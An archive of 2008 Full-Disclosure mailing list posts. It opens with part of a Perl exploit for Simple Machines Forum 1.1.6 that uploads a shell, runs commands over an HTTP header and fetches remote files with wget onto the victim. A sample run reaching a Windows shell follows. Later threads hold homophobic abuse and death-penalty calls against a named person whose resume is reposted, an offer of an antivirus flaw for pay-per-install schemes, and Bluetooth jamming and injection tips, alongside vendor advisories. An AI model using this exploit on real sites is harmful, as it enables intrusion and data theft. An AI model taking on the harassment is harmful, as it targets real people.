$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");
print "[ii] Uploaded a shell...\n" if $parms{d};

shell();

## lulz @ this shit.
sub shell {
    my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}",
        SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;
    die "[!!] magic_quotes is turned on\n"
        if (not defined $os or not defined $sh or $1 eq $id);
    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";
    do {
        print "[$sh\@$os]\$ ";
        $cmd = chomp (my $cmd = );
        exit unless $cmd !~ /^exit$/i;
        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else {
            undef $file;
        }
        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
        }
        $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}",
            SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";
        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
    } while( $cmd !~ /^exit$/i );
    exit;
}
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkkSas0ACgkQxKkly4PzmN5NMgP9HfdmqQqLoxVm8CgY2u+WmWt4m0NT
9y+p5GZrI9J8BTzskbrqtYi3eVczGJZXsxySxFNkwsxNEfqTEw/9g6a8+aR31ZvfdtCl
0Zba95awFpui1NldrmbYHlzQBRcZKgOzSJ/NbNyXZKFoEbNpAyzOeiJ687DigtI3999L
8+iF4bw=
=Ekcf
-----END PGP SIGNATURE-----

From elmysterio at hushmail.com Thu Nov 6 03:57:19 2008
From: elmysterio at hushmail.com (elmysterio at hushmail.com)
Date: Wed, 05 Nov 2008 22:57:19 -0500
Subject: [Full-disclosure] [0day] Simple Machines Forum * <= 1.1.6 Code Execution
Message-ID: <20081106035719.837932803B@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that killed rgod.
#         We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php & Sources/Themes.php w/ magic_quotes == Off
# @gr33t: m0rt's failure, it never stops.
#
# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
#     -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd at win32]$ ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [cmd at win32]$
#
# FOR LULZ PURPOSE ONLY!!
#
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkkSax8ACgkQxKkly4PzmN6NRwP/eL/Q6zKYoeuNmOlPk8QMesJjVUu5
oe+zFmLwOBexDYI0JRSUqPSyDglh9JsD270gwLMzwoE1jeg8tmeLtI6QmgTIXL+D0e6X
S/XQ+UFA6+2lq5QwGSOZpstbQAqgvM/rmynP0ayeu23Gmk9yMiOq32jgHRiBRDl1S/EW
6uD17+4=
=/Wd7
-----END PGP SIGNATURE-----

From n0td3v at gmail.com Thu Nov 6 04:58:43 2008
From: n0td3v at gmail.com (not dev)
Date: Wed, 5 Nov 2008 20:58:43 -0800
Subject: [Full-disclosure] Death of a Gay h4x0r!
Message-ID: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com>

Death of a Gay H4x0r
By: n0td3v

Whitehats rejoice. Gadi Evron and the Internet Defense League proudly announces that the Unix Terrorist aka Jim Jones aka Stephen Watt is no longer a threat to society. Stephen is most well known for back dooring of the Qualys Vulnerability Scanner as well as being the founder and brains behind the failed pr0j3ct m4yh3m and PHC and el8 and bantown and Internet Justice.
Let us all rejoice by following Gadi Evron in his love of the cock and all things whitehat. http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1337803,00.html http://www.usdoj.gov/criminal/cybercrime/wattCharge.pdf Resume of Stephen Watt Real Time Trading Systems Developer Location Greater New York City Area Industry Information Technology and Services Current * Developer at derivatives.com Past * Associate at Morgan Stanley * Security Developer at Qualys Inc. Education * University of Central Florida Summary Previous experience has included security vulnerability research and development in a major industry-leading security vulnerability assessment firm. More recently, work involved network-security related development at a major financial services institution, as well as general infrastructure toolkit development. Current work consists of writing code relating to securities exchange infrastructure and portfolio management functionality. Goals for the future are researching and engineering algorithmic trading platforms. Applications Experience Developer - derivatives.com Information Technology and Services industry February 2007 ? Present (1 year 10 months) Portfolio and exchanges interfaces development for a real time trading system Associate - Morgan Stanley Public Company; Information Technology and Services industry May 2004 ? February 2007 (2 years 10 months) Application infrastructure development and in house security toolkit development Security Developer - Qualys Inc. Privately Held; 51-200 employees; Information Technology and Services industry June 2001 ? August 2002 (1 year 3 months) Conducted research and development for an industry-leading network vulnerability scanner, in a C/UNIX environment. Performed binary-only system audits of proprietary operating systems and developed proof-of-concept exploits for discovered vulnerabilities Education University of Central Florida 2000 ? 
2003 The Internet Defense League or IDL recommends that all whitehat follow this trial and write letters to the prosecuting attorney and the judge and your congressman to make sure that this terrorist and petty criminal is brought to justice and receives the maximum possible penalty. A letter and petition asking for the death penalty or immediate shipment to Guantanamo Bay as an enemy combatant has already been forwarded to President elect Barack Obama. Stephen Watt is the reason the world economy is failing. Stephen Watt did this for known terrorist groups. You can have Internet Justice IDL will take real life justice in trade. From hdw at kallisti.se Thu Nov 6 05:30:35 2008 From: hdw at kallisti.se (Anders B Jansson) Date: Thu, 06 Nov 2008 06:30:35 +0100 Subject: [Full-disclosure] Death of a Gay h4x0r! In-Reply-To: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com> References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com> Message-ID: <491280FB.3020100@kallisti.se> Who cares? A petty thief spending time getting sodomized in prison? Well, if you you don't wanna play the game, then don't play the game. Obviously he wanted to played the game, and now he'll the second round of the game. // hdw not dev wrote: > Death of a Gay H4x0r > By: n0td3v > > > > Whitehats rejoice. Gadi Evron and the Internet Defense League proudly > announces that the Unix Terrorist aka Jim Jones aka Stephen Watt is no > longer a threat to society. Stephen is most well known for back > dooring of the Qualys Vulnerability Scanner as well as being the > founder and brains behind the failed pr0j3ct m4yh3m and PHC and el8 > and bantown and Internet Justice. > > Let us all rejoice by following Gadi Evron in his love of the cock and > all things whitehat. 
> > http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1337803,00.html > > http://www.usdoj.gov/criminal/cybercrime/wattCharge.pdf > > Resume of Stephen Watt > > Real Time Trading Systems Developer > > Location > > Greater New York City Area > > Industry > > Information Technology and Services > > Current > > * Developer at derivatives.com > > Past > > * Associate at Morgan Stanley > > * Security Developer at Qualys Inc. > > Education > > * University of Central Florida > > Summary > > Previous experience has included security vulnerability research and > development in a major industry-leading security vulnerability > assessment firm. More recently, work involved network-security related > development at a major financial services institution, as well as > general infrastructure toolkit development. > > Current work consists of writing code relating to securities exchange > infrastructure and portfolio management functionality. > > Goals for the future are researching and engineering algorithmic > trading platforms. > > Applications Experience > > Developer - derivatives.com > Information Technology and Services industry > > February 2007 ? Present (1 year 10 months) > > Portfolio and exchanges interfaces development for a real time trading system > > Associate - Morgan Stanley > > Public Company; Information Technology and Services industry > > May 2004 ? February 2007 (2 years 10 months) > > Application infrastructure development and in house security toolkit development > > Security Developer - Qualys Inc. > > Privately Held; 51-200 employees; Information Technology and Services industry > > June 2001 ? August 2002 (1 year 3 months) > > Conducted research and development for an industry-leading network > vulnerability scanner, in a C/UNIX environment. 
Performed binary-only > system audits of proprietary operating systems and developed > proof-of-concept exploits for discovered vulnerabilities > > Education > > University of Central Florida > 2000 ? 2003 > > > > The Internet Defense League or IDL recommends that all whitehat follow > this trial and write letters to the prosecuting attorney and the judge > and your congressman to make sure that this terrorist and petty > criminal is brought to justice and receives the maximum possible > penalty. A letter and petition asking for the death penalty or > immediate shipment to Guantanamo Bay as an enemy combatant has already > been forwarded to President elect Barack Obama. Stephen Watt is the > reason the world economy is failing. Stephen Watt did this for known > terrorist groups. > > You can have Internet Justice IDL will take real life justice in trade. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- // hdw From hawkgotyou at gmail.com Thu Nov 6 08:58:12 2008 From: hawkgotyou at gmail.com (BlackHawk) Date: Thu, 6 Nov 2008 09:58:12 +0100 Subject: [Full-disclosure] [0day] Simple Machines Forum * <= 1.1.6 Code Execution In-Reply-To: <20081106035719.837932803B@smtp.hushmail.com> References: <20081106035719.837932803B@smtp.hushmail.com> Message-ID: <621e1d10811060058j4894f9abw5742595d8342fd35@mail.gmail.com> > # @descp: In loving memory of the rare bone marrow disease that > killed rgod. > # We can't thank you enough for killing a bug killer. no comment.. :| From kokanin at gmail.com Thu Nov 6 09:54:36 2008 From: kokanin at gmail.com (=?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?=) Date: Thu, 6 Nov 2008 10:54:36 +0100 Subject: [Full-disclosure] Death of a Gay h4x0r! 
In-Reply-To: <491280FB.3020100@kallisti.se>
References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com> <491280FB.3020100@kallisti.se>
Message-ID:

On Thu, Nov 6, 2008 at 6:30 AM, Anders B Jansson wrote:
> Obviously he wanted to played the game, and now he'll the second round of the game.

And now he accidentally the entire fleshlight!

From devin at debian.org Thu Nov 6 04:20:00 2008
From: devin at debian.org (Devin Carraway)
Date: Thu, 06 Nov 2008 04:20:00 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1662-1] New mysql-dfsg-5.0 packages fix authorization bypass
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1662-1                  security at debian.org
http://www.debian.org/security/                           Devin Carraway
November 06, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : mysql-dfsg-5.0
Vulnerability  : authorization bypass
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-4098
Debian Bug     : 480292

A symlink traversal vulnerability was discovered in MySQL, a relational database server. The weakness could permit an attacker having both CREATE TABLE access to a database and the ability to execute shell commands on the database server to bypass MySQL access controls, enabling them to write to tables in databases to which they would not ordinarily have access.

The Common Vulnerabilities and Exposures project identifies this vulnerability as CVE-2008-4098. Note that a closely aligned issue, identified as CVE-2008-4097, was prevented by the update announced in DSA-1608-1. This new update supersedes that fix and mitigates both potential attack vectors.

For the stable distribution (etch), this problem has been fixed in version 5.0.32-7etch8.

We recommend that you upgrade your mysql packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFJEmvqU5XKDemr/NIRAtjFAKD0b1I33j80Z6JworeVVlNHKuW4yQCfVusE
I5MOY2TVITMgVkkzs7IrQTw=
=5+yr
-----END PGP SIGNATURE-----

From tribalmp at gmail.com Thu Nov 6 13:05:46 2008
From: tribalmp at gmail.com (Tribal MP)
Date: Thu, 6 Nov 2008 13:05:46 +0000
Subject: [Full-disclosure] AVG 8.0.173 flaw
Message-ID: <40ca6f560811060505o3acde47dn33c9a6a962142604@mail.gmail.com>

@ alessandro telami
Most antivirus nowadays locks their processes. AVG 8.0.173 and older doesn't. At the time I'm writing these lines, there are public computers in my local area that can be used to infect.

Note: This is useful for hack tools execution or pay-per-install schemes.

Note 2: An automatic POC with source is already made.

From Valdis.Kletnieks at vt.edu Thu Nov 6 15:11:27 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 06 Nov 2008 10:11:27 -0500
Subject: [Full-disclosure] Death of a Gay h4x0r!
In-Reply-To: Your message of "Thu, 06 Nov 2008 10:54:36 +0100."
References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com> <491280FB.3020100@kallisti.se>
Message-ID: <12542.1225984287@turing-police.cc.vt.edu>

On Thu, 06 Nov 2008 10:54:36 +0100, Knud Erik Højgaard said:

> And now he accidentally the entire fleshlight!

This sentence no verb.

From nytrokiss at gmail.com Thu Nov 6 16:45:22 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Thu, 6 Nov 2008 18:45:22 +0200
Subject: [Full-disclosure] Death of a Gay h4x0r!
In-Reply-To: <12542.1225984287@turing-police.cc.vt.edu>
References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com> <491280FB.3020100@kallisti.se> <12542.1225984287@turing-police.cc.vt.edu>
Message-ID: <8a6b8e350811060845q7010a5ebm4e8c2df1fc35c2d8@mail.gmail.com>

He isn't so bad have some mercy ;)

On 11/6/08, Valdis.Kletnieks at vt.edu wrote:
> On Thu, 06 Nov 2008 10:54:36 +0100, Knud Erik Højgaard said:
>
>> And now he accidentally the entire fleshlight!
>
> This sentence no verb.
>

--
http://www.goldwatches.com/
http://www.jewelerslounge.com/

From rholgstad at gmail.com Thu Nov 6 17:47:01 2008
From: rholgstad at gmail.com (rholgstad)
Date: Thu, 06 Nov 2008 11:47:01 -0600
Subject: [Full-disclosure] Death of a Gay h4x0r!
In-Reply-To: <12542.1225984287@turing-police.cc.vt.edu>
References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com> <491280FB.3020100@kallisti.se> <12542.1225984287@turing-police.cc.vt.edu>
Message-ID: <49132D95.9090001@gmail.com>

you are showing your age... might be time for an internet exits

Valdis.Kletnieks at vt.edu wrote:
> On Thu, 06 Nov 2008 10:54:36 +0100, Knud Erik Højgaard said:
>
>
>> And now he accidentally the entire fleshlight!
>>
>
> This sentence no verb.
>

From telami at hotmail.com Thu Nov 6 17:49:51 2008
From: telami at hotmail.com (alessandro telami)
Date: Thu, 6 Nov 2008 17:49:51 +0000
Subject: [Full-disclosure] AVG 8.0.173 flaw
In-Reply-To: <40ca6f560811060505o3acde47dn33c9a6a962142604@mail.gmail.com>
References: <40ca6f560811060505o3acde47dn33c9a6a962142604@mail.gmail.com>
Message-ID:

My point is/was that with that kind of privileges on the machine there is no point in killing the AV processes, when you could just format the hard drive or do whatever you like on the machine.

> Date: Thu, 6 Nov 2008 13:05:46 +0000
> From: tribalmp at gmail.com
> To: full-disclosure at lists.grok.org.uk
> Subject: [Full-disclosure] AVG 8.0.173 flaw
>
> @ alessandro telami
> Most antivirus nowadays locks their processes. AVG 8.0.173 and older
> doesn't. At the time I'm writing these lines, there are public
> computers in my local area that can be used to infect.
>
> Note: This is useful for hack tools execution or pay-per-install schemes.
>
> Note 2: An automatic POC with source is already made.

From shawnmer at gmail.com Thu Nov 6 19:37:07 2008
From: shawnmer at gmail.com (Shawn Merdinger)
Date: Thu, 6 Nov 2008 14:37:07 -0500
Subject: [Full-disclosure] Bluetooth keyloggers?
Message-ID:

Hi List,

Just wondering if anyone has technical feedback/musings on the emerging bluetooth keyloggers available, such as the following products:

1. http://www.wirelesskeylogger.com/index.php
2. http://www.keyear.com/articles_pages/BTKeyEar2.html
4. Other commercially offered products?
3. Any custom kit/gear folks have cooked up, and are willing to talk about, bringing to a conference, etc.?

Specifically I'm looking to find out more concerning these attributes:

* Remote discovery of these devices (active and passive) via bluetooth, localhost device discovery, any other means, etc.
* Countermeasures, any and all, including isolated "jamming" and, if feasible, control of data flow or "injection" of false data
* Fingerprinting (a la "Blueprinting" - http://trifinite.org/trifinite_stuff_blueprinting.html)
* Real-world performance in light of interference (signal and obstacles)
* Any other "stuff" -- honeypots, long-distance snarfage, creative applications, automation, etc. ;-)

Off list comments are fine too.

Cheers,
--scm

From michael.holstein at csuohio.edu Thu Nov 6 20:39:53 2008
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Thu, 06 Nov 2008 15:39:53 -0500
Subject: [Full-disclosure] Bluetooth keyloggers?
In-Reply-To:
References:
Message-ID: <49135619.8040402@csuohio.edu>

> Just wondering if anyone has technical feedback/musings on the
> emerging bluetooth keyloggers available, such as the following
> products:
>

Yeah .. use a USB keyboard ;)

> * Remote discovery of these devices (active and passive) via
> bluetooth, localhost device discovery, any other means, etc.
>

Bluesniff can discover devices (including non-discoverable ones, if they're active) .. much like you can find wifi devices even if the SSID is hidden. Even though BT is encrypted, you can still see the frames at L2.

They can also be found the same way one finds hidden 2.4ghz cameras .. using spectrum analyzers (I have an icom handheld that does this marginally well if you're close enough).

> * Countermeasures, any and all, including isolated "jamming" and, if
> feasible, control of data flow or "injection" of false data
>

Well, if you're willing to throw the "Part B" rules out the window .. any broadband noise generator tuned to the appropriate frequency will work. Most of the cheap-o Chinese jammers for Cellphone/GPS are just a simple VCO and amplifier .. easy to tune into the appropriate band.

As for injection .. with the bluejacking tools you can force a re-pairing, and then bruteforce. Since the devices you link to are designed to be passive, I'd imagine they'd automatically re-pair (versus a phone, which would prompt the user to do something).

> * Real-world performance in light of interference (signal and obstacles)
>

bluetooth dongle to my Samsung cellphone works ~20' in a typical office. Their statement about a "football field" is only true if you were actually in an open field.

> * Any other "stuff" -- honeypots, long-distance snarfage, creative
> applications, automation, etc. ;-)
>
>

.. a 24db parabolic plus a bluetooth dongle modded for an external antenna can give you several hundred feet, easily.

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University

From Thierry at Zoller.lu Thu Nov 6 20:46:09 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Thu, 6 Nov 2008 21:46:09 +0100
Subject: [Full-disclosure] Bluetooth keyloggers?
In-Reply-To:
References:
Message-ID: <1778962366.20081106214609@Zoller.lu>

Hi,

SM> * Remote discovery of these devices (active and passive) via
SM> bluetooth, localhost device discovery, any other means, etc.

Passive detection is always possible
Active (as in scan(query) detection depends on keylogger setup - I would guess no

SM> * Countermeasures, any and all, including isolated "jamming" and, if
SM> feasible, control of data flow or "injection" of false data

Jamming is always possible, injection depends on protocol usage

--
http://secdev.zoller.lu
Thierry Zoller

From security at mandriva.com Thu Nov 6 22:52:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 06 Nov 2008 15:52:00 -0700
Subject: [Full-disclosure] [ MDVSA-2008:226 ] ruby
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2008:226
http://www.mandriva.com/security/
_______________________________________________________________________

Package : ruby
Date : November 6, 2008
Affected: 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

A denial of service condition was found in Ruby's regular expression engine. If a Ruby script tried to process a large amount of data via a regular expression, it could cause Ruby to enter an infinite loop and crash (CVE-2008-3443).

A number of flaws were found in Ruby that could allow an attacker to create a carefully crafted script that could allow for the bypass of certain safe-level restrictions (CVE-2008-3655).

A denial of service vulnerability was found in Ruby's HTTP server toolkit, WEBrick. A remote attacker could send a specially-crafted HTTP request to a WEBrick server that would cause it to use an excessive amount of CPU time (CVE-2008-3656).

An insufficient taintness check issue was found in Ruby's DL module, a module that provides direct access to the C language functions.
This flaw could be used by an attacker to bypass intended safe-level restrictions by calling external C functions with the arguments from an untrusted tainted input (CVE-2008-3657).

A denial of service condition in Ruby's XML document parsing module (REXML) could cause a Ruby application using the REXML module to use an excessive amount of CPU and memory via XML documents with large XML entity definitions recursion (CVE-2008-3790).

The Ruby DNS resolver library used predictable transaction IDs and a fixed source port when sending DNS requests. This could be used by a remote attacker to spoof a malicious reply to a DNS query (CVE-2008-3905).

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3443
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3655
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3656
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3657
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3905
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJE0cxmqjQ0CJFipgRApyNAJ4kNIoxQAwjj7P4+7Z59CADJSLfzACgpYct
0C/j0PQUiS/4p83mt2eyB7k=
=C3Tt
-----END PGP SIGNATURE-----

From ivanhec at gmail.com Thu Nov 6 23:03:11 2008
From: ivanhec at gmail.com (Ivan .)
Date: Fri, 7 Nov 2008 10:03:11 +1100
Subject: [Full-disclosure] Once thought safe, WPA Wi-Fi encryption is cracked
Message-ID: <6450e99d0811061503k7bc99f24oe83955e87cd50960@mail.gmail.com>

To do this, Tews and his co-researcher Martin Beck found a way to break the Temporal Key Integrity Protocol (TKIP) key, used by WPA, in a relatively short amount of time: 12 to 15 minutes, according to Dragos Ruiu, the PacSec conference's organizer.

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9119258

From xploitable at gmail.com Thu Nov 6 23:48:06 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 6 Nov 2008 23:48:06 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
Message-ID: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>

On Thursday, Microsoft announced two security bulletins for Tuesday. The advance notice is intended as a heads up for IT departments before Patch Tuesday, the company's monthly patch day. One bulletin is considered critical, the most serious ranking offered by the software giant, while the other is ranked important, the next most serious.

The critical patch will affect XML Core Services in Windows and Microsoft Office. The important bulletin will affect only Windows. If exploited, Microsoft says the specific vulnerabilities addressed in these bulletins could cause remote code execution.

http://news.cnet.com/8301-1009_3-10084063-83.html

i'm not sure this is a good idea as it gives a heads up to hackers. you may think it's not long but it's actually 5 days for a hacker to figure out potentially a vulnerability in said area.
maybe we should have a discussion about the pros and cons of these microsoft heads up and what the reality of it is for the bad guys to be able to pin point and start exploiting a flaw in said area in a 5 day time frame. yours
n3td3v.

-------

Helping keep you safe online -

Here you can join me to information share about what the real hackers and bad hackers are up to.

http://groups.google.com/group/n3td3v

From biz.marqee at gmail.com Fri Nov 7 00:10:47 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Fri, 7 Nov 2008 11:10:47 +1100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
Message-ID:

maybe we should have a discussion on what a drug addled cock lover you are?

On Fri, Nov 7, 2008 at 10:48 AM, n3td3v wrote:
> On Thursday, Microsoft announced two security bulletins for Tuesday.
> The advance notice is intended as a heads up for IT departments before
> Patch Tuesday, the company's monthly patch day. One bulletin is
> considered critical, the most serious ranking offered by the software
> giant, while the other is ranked important, the next most serious.
>
> The critical patch will affect XML Core Services in Windows and
> Microsoft Office. The important bulletin will affect only Windows. If
> exploited, Microsoft says the specific vulnerabilities addressed in
> these bulletins could cause remote code execution.
>
> http://news.cnet.com/8301-1009_3-10084063-83.html
>
> i'm not sure this is a good idea as it gives a heads up to hackers.
> you may think it's not long but it's actually 5 days for a hacker to
> figure out potentially a vulnerability in said area. maybe we should
> have a discussion about the pros and cons of these microsoft heads up
> and what the reality of it is for the bad guys to be able to pin point
> and start exploiting a flaw in said area in a 5 day time frame.
> yours
> n3td3v.
>
> -------
>
> Helping keep you safe online -
>
> Here you can join me to information share about what the real hackers
> and bad hackers are up to.
>
> http://groups.google.com/group/n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From waveroad at gmail.com Fri Nov 7 00:14:35 2008
From: waveroad at gmail.com (waveroad waveroad)
Date: Thu, 6 Nov 2008 19:14:35 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <296a304a0811061603r4c19af18s6264b0c77b077e45@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <296a304a0811061603r4c19af18s6264b0c77b077e45@mail.gmail.com>
Message-ID: <296a304a0811061614w2f976c64qa3f07bf3de88e5e@mail.gmail.com>

Shut the fuck up

We're tired to hear your shit dude. Why don't you just keep on squatting your fucking mailing list with your friends?

You have no friends here, and you're not welcome, get the fuck out of here.

From xploitable at gmail.com Fri Nov 7 00:31:23 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 00:31:23 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To:
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
Message-ID: <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>

blackhats like you will always hate on me, so i just ignore the negative responses i get.
From waveroad at gmail.com Fri Nov 7 00:40:02 2008
From: waveroad at gmail.com (waveroad waveroad)
Date: Thu, 6 Nov 2008 19:40:02 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
Message-ID: <296a304a0811061640h55fb6fabx67df0b91a17c66b4@mail.gmail.com>

That's a good try, you play the oppressed card, Calimero said it: life is so unjust. Too bad that's not the real reason.

You're polluting this mailing list since a couple of years, there's even a profiling Pdf dedicated to you (amnesic reminder: www.hackerfactor.com/papers/who_is_n3td3v.pdf) now it's enough, it's not a question about white/grey/blue/black hat, it's about a fucking moron named n3td3v.

So please consider my past advice: Get The Fuck Out Of Here, you have no friends here.

2008/11/6, n3td3v :
>
> blackhats like you will always hate on me, so i just ignore the
> negative responses i get.
>

From biz.marqee at gmail.com Fri Nov 7 00:48:14 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Fri, 7 Nov 2008 11:48:14 +1100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
Message-ID:

Do you even understand why people don't like you? It is because you have all these crackpot ideas but no experience to back it up. All your ideas only make sense from a theoretical standpoint, but in practicality most will fail.
Do you understand that or are you much of an ignorant person to even realise that you are a joke to us. I will say that again just in case you missed it YOU ARE A JOKE.

And people don't think I just make up that he's a drugfuck, he even admitted his use of illegal substances way back in 2005. So, Mr n3td3v, my question to you is how can you be in such support of the government's security posture on one hand, but ignore their views on drugs on the other? Do you think you are above the government's laws and as such only need to follow what you dictate to be applicable to you?

On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote:
> blackhats like you will always hate on me, so i just ignore the
> negative responses i get.
>

From hdw at kallisti.se Fri Nov 7 00:40:24 2008
From: hdw at kallisti.se (Anders B Jansson)
Date: Fri, 07 Nov 2008 01:40:24 +0100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
Message-ID: <49138E78.2030605@kallisti.se>

n3td3v wrote:
> blackhats like you will always hate on me, so i just ignore the
> negative responses i get.

